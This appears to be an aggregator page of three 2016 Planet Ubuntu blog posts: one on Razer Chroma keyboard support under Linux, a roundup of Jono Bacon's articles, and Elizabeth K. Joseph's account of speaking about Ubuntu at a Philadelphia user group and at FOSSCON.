One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link . It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on GitHub that makes it work on Ubuntu/Linux Mint, Debian, and possibly a few others, since the source is available here: source link
Here is what the application looks like:

It even has a tray applet to change the colors and effects quickly.

3 days ago

Jono Bacon: Bacon Roundup – 23rd August 2016 from Planet Ubuntu

Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox.

Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here.

Without further ado, the roundup:

Building a Career in Open Source (opensource.com)
A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue (jonobacon.org)
At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers (jonobacon.org)
I have been working with HackerOne, and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science with data.world (jonobacon.org)
I have also recently been working with data.world, who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for data.world, and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities (opensource.com)
Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation on which we build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor (jonobacon.org)
Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide (opensource.com)
Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can, though, be a little complicated for attendees to figure out. Here are some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe.

The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.

4 days ago

Elizabeth K. Joseph: Ubuntu in Philadelphia from Planet Ubuntu

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.
But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I was also able to give away a copy of The Official Ubuntu Book, 9th Edition, to an attendee who was new to Ubuntu.
Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.
Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.
Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long-time LoCo member Randy Gold.
They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.

Thanks to Randy for the booth photo!
At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them, and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.

My co-author, José Antonio Rey, signing a copy of our book!

5 days ago